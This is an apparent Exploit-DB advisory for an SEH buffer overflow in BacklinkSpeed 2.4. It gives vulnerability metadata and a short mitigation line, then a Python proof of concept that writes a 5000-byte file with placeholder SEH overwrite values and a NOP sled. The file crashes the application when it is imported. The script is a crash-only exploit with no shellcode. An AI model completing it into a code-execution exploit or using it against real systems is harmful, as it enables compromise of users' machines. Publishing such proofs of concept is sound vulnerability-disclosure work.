BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)

vendor:

BacklinkSpeed

by:

Saeed reza Zamanian

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BacklinkSpeed

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE: N/A

CPE: a:dummysoftware:backlinkspeed:2.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10.0 x64 Build 10240, Windows 7 x64, Windows Vista x32 SP1

2020

BacklinkSpeed 2.4 – Buffer Overflow PoC (SEH)

BacklinkSpeed 2.4 is vulnerable to a buffer overflow vulnerability when a maliciously crafted payload is imported. This can lead to arbitrary code execution. The exploit creates a text file named payload.txt which contains a 5000 byte payload followed by a nSEH and SEH value. When the payload.txt is imported, the application crashes due to the buffer overflow.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
# Date: 2020-08-01
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on: 
	Windows 10.0 x64 Build 10240
	Windows 7 x64
	Windows Vista x32 SP1
# Replicate Crash:
  1) Install and Run the application
  2) Run the exploit , the exploit create a text file named payload.txt
  3) Press import button and open payload.txt
  
#!/usr/bin/python
'''

	|----------------------------------|
	| SEH chain of thread 00000350	   |
	| Address    SE handler		   |
	| 42424242   *** CORRUPT ENTRY *** |
	|				   |
	| EIP : 43434343		   |
	|----------------------------------|
'''

nSEH = "BBBB"
SEH = "CCCC"
payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH

try:

    f=open("payload.txt","w")

    print("[+] Creating %s bytes payload." %len(payload))

    f.write(payload)

    f.close()

    print("[+] File created!")

except:

    print("File cannot be created.")